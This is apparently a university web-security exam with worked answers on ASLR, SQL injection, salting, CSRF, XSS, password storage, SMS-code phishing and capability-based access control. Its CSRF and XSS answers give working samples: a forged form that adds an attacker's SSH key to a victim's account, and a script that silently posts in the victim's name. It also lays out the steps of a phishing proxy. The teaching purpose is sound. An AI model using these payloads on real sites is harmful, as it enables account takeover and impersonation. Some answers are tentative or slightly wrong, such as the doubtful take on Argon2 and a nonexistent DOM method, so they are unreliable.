INF226 Exam Autumn 2021

Exercise 1

a) Where in the memory layout of a C program does the call stack lie?

The stack is at the "top" of memory, [Somewhere around 0x7ffffffffff0]

b) How can address space layout randomization (ASLR) make it more difficult for an attacker to perform return oriented programming?

The program code and all libraries are at random locations, so you don't know what addresses to return to, and stack is at a random location, so it's difficult to read/write directly from/to stack locations.

(E.g., stack is at 0x7fff7237b000 rather than 0x7ffffffffff0, C library gets loaded at 0x7f315233b000 instead of 0x7f9de7969000)

c) What does the Secure flag on a cookie indicate?

Can only be sent over a secure connection. (https)

d) Why should untrusted data not be inserted directly into a SQL query using string concatenation?

Mixes program code with data, input data can be misunderstood as code to be executed. (Code injection attack.)

e) Why do we add salt to a key derivation function when implementing password based authentication?

Makes an attack more difficult by ensuring that the same password doesn't always hash to the same hash code. (One leak doesn't expose all passwords.)

hash("passw0rd" + 77): salt=77, hash=64222cbfdbf hash("passw0rd" + 42): salt=42, hash=6784213abcd

f) What is the difference between static and dynamic program analysis?

Program analysis tries to predict or measure how a program will behave in many (or all possible) circumstances.
Static program analysis example: type checking; predicting null pointer exceptions; tracing tainted data
Dynamic program analysis example: code coverage or testing directed by code coverage; tools for detecting memory leaks and race conditions; tracing tainted data; just running the program (not very useful as analysis, though); running the program in a debugger (slightly more useful)

Dynamic program analysis works with real (or simulated) input and can give more precise but less general answers; static analysis makes estimates based on what can happen, will need to make some assumptions, is more likely to detect problems that aren't there, but can much more definitely say that a problem isn't there. [Type check fails? Type error might never happen in real life. Type check succeeds? There are no type errors (of the kind the type checker can find).]

Exercise 2

a) Explain how an attacker could use CSRF to insert their own public key into a victim’s list of trusted keys. What would the victim need to do in order for the attack to begin?

Pre-fill the form with the attacker's details, trick the victim into clicking on it while logged in to GitHub/GitLab.

<form id="new_key" action="https://github.com/profile/keys" method="POST">
<p>Paste your public SSH key.</p>
<textarea name="key[key]" id="key_key">ssh-rsa …+93fuyVrop7AnmhJG5CXT1wwFdnSwzNEjtgkT+Ywjc6ARW…== anya</textarea>
<label class="label-bold" for="key_title"></label>
<input hidden="true" name="key[title]" id="key_title" value="Per Olav's totally normal SSH key">
<input type="submit" name="commit" value="Send me by free T-shirt">
</form>

(Or see tricks to submit automatically later.)

b) Would the CSRF be prevented if the SameSite flag on the session cookie was set to ‘Lax’? Why/why not?

SameSite Lax means GET requests from other sites get cookies sent with them, POST requests do not get cookies, so it would prevent this (since the form will be POSTed).

[extra details: SameSite Strict – No requests from other sites will have cookies sent with them. SameSite None – always send cookies (usually implies Secure) (a CSRF token would also prevent the attack) ]

c) How would the security of the form be affected if method was set to “GET” instead of “POST”?

GET – can be put in a link, the link could be placed in a stylesheet, for example

   background-image: url(https://github.com/profile/keys?key=HKDKJASHLJSHLJA&title=MyKey)

GET – will have cookies sent along if policy is Lax or None, POST is more restrictive (cookies only sent with SameSite None)

Exercise 3

a) Explain why the above code is vulnerable to cross-site scripting.

It inserts strings into HTML code that gets sent to the browser, without sanitizing the HTML code. So, it could contain <script> tags with code code to be executed – or elements with onclick=, onblur=, onerror=, or style=.

b) How would you fix this vulnerability?

One or more of these:

Quote/escape all special characters, e.g., < → <.
Parse it as HTML, strip all non-whitelisted tags (EM, B, SUP, SUB, A)
Some other version of strip all non-whitelisted tags
Allow messages formatted as Markdown (without HTML) or with fancy editor (note: user might still be able to paste some HTML code by copying preformatted text from a browser window)
On the client side, build the message display document tree/fragment, insert data directly into the DOM with msgElement.innerText = msgData.message.
Use a safe templating system

From discussion of OWASP XSS Cheat Sheet

Defence philosophy (yes! very important): Ensuring that all variables go through validation and are then escaped or sanitized is known as perfect injection resistance.

Escaping is annoyingly different for all languages:

URL encoding: '\n' => %0a
HTML encoding: '\n' => &x0a; – but attributes have different rules
JS encoding: '\n' => \n
CSS: \xx or \xxxxxx
What about URLs in attributes (like <a href="…">)?

Good solutions:

Framework's template system (but be careful about functions that allow raw data to be inserted; and be careful when building templates by string concatenation (template/format string injection problem!))
JavaScript templates: html<em>${var1}</em> – parses and constructs document tree before inserting data!
Insert data into DOM tree via JavaScript – always safe: elem.textContent = '…' someLink.setAttribute('href', myURL) (see also someLink.href = …)

Totally not safe:

someLink.outerHTML = '<a href="' + myURL + '">link text</a>'

c) What message would an attacker send in order to cause a user viewing the message to send a message to a channel? To be specific, assume that the channel is called “SuperChannel”, and that the attacker wants the user to post the message “XYZZY”. For reference, the source code for the message sending form is below.

<script>
    // submit when page is loaded – alternatively add an event handler to one of the elements
    document.addEventListener('DOMContentLoaded', (e) => {
        // you could also build and submit the form by script
        document.getElementByName("myForm75").submit();
        // or if the unfilled form is already on the page
        const form = document.querySelector("form.entry");
        // fill in message data
        form.submit();
    });
</script>
<!-- this is display:none, so the user will see nothing -->
<form id="myForm75" style="display:none" class="entry" action="/channel/SuperChannel" method="post">
<div class="user">You</div> <!-- should probably be a 'user' form field -->
<input type="hidden" name="newmessage" value="Send">
<textarea id="messageInput" name="message">XYZZY</textarea>
</form>
<!-- the message the user will see -->
Did you hear the latest security joke? …

Exercise 4

a) How would you ensure that the users are likely to pick good passwords? What requirements and other measures would you put in place?

At least 8 characters
At least two of letter, number, symbol
Not something found in the dictionary

Use an existing library to check passwords?
Have the site generate a password
Tell the users to not share the password, inform them of safe ways of storing passwords
Best to keep things fairly simple?

SHA1 hash ASCII (broken, can find password from hash)
Plaintext 4–6 digit numeric code (bad, immediate breach)
Argon2 Unicode (who knows? no cryptoanalysis, some attacks found; )
SHA256 + salt Unicode (SHA256 is ok I think? )

hash("passw0rd" + salt)

b) Compare the four mechanisms above, from the perspective of a potential breach of the database. How would the various mechanisms fare against brute force, dictionary and rainbow table attacks?

Brute force – numeric code is trivial to brute force. ASCII is more difficult; Unicode is very difficult, but only if users use more than normal letters. Bigger search space, more difficult to do use rainbow tables. More salt, more difficult to use rainbow tables.

In summary: I'd use option 4 – large search space for passwords, hashing is standard.

c) How can SMS verification codes be vulnerable to phishing attacks, such as tricking the user to visiting a proxy site?

Easy:

Create similar webpage, with similar address (l vs i vs 1 confusion; www.dnb.no.myevilsite.com, www.dnb.no@myevilsite.com)
Get the user to log in, send password to legit site
Legit site sends SMS code
User enters code
You forward the code or use it yourself (distract the user with an error message)
=> man-in-the-middle attack

More difficult, but possible:

Trick the phone routing system SS7 to send SMS and calls to your laptop/software
(A lot more difficult with emails, unless you're the email provide.)

d) How could public key based two-factor authentication protect against a malicious proxy?

Everyone can authenticate with certificates, the challenge/response/signed assertion thing is done through the system and not by the user entering code into a potentially fake website.

Exercise 5

a) Which kind of access control system is this? (Of the kinds we have discussed in class.)

Access control lists (ACLs) List base (Permissions-based?) access control system

b) What general class of security problems does the bot issue belong to? Explain in some detail why the problem belongs to this class. Hint: this class of problems is inherent to this kind of access control system.

The confused deputy problem – you let someone act on your behalf, but that some has more rights than you and you trick it into doing bad stuff.

It's difficult to stop, because the deputy has to redo to the entire permissions check.

[On Unix, setuid programs often have confused deputy problems (POSIX API has concepts like 'real' and 'effective' user and complicated system calls like "am I allowed to read this file as the user I was before I temporarily changed to the user I am now?"]

c) Suggest a table schema for a capability based access control system for SafeChat, and explain your design. The system should have centrally controlled capability ownership stored in the database or unguessable tokens – choose what you find most appropriate.

When Mallory asks the bot to post a message, she should give it: (the message, her permission to post it, when it should be posted, where it should be posted)

JWT – JSON Web Tokens (might be what you get from OAuth 2.0)

data = {
    who: Mallory
    permission: post,
    what_to_post: message,
    who_can_post: bot,
    …
}
signature = sign(data, mallorys_private_key)

Give sign+data to bot. When the bot wants to post something, it gives the message and signature to the channel (thing that broadcasts), then the channel can see Mallory is supposed to post, what the message is, and can check the signature against Mallorys public key (or some kind of certificate authority) and even verify that bot is the one that was authorized to post on Mallory's behalf

d) How would transferring capabilities between users be done in the database schema you outlined?

e) How would revoking capabilities between users be done in this system?

f) How should the capabilities be organised for the bot to prevent the issues SafeChat has been struggling with? Give a concrete example, for instance using the situation with SuperChannel.

Exam 2021 Autumn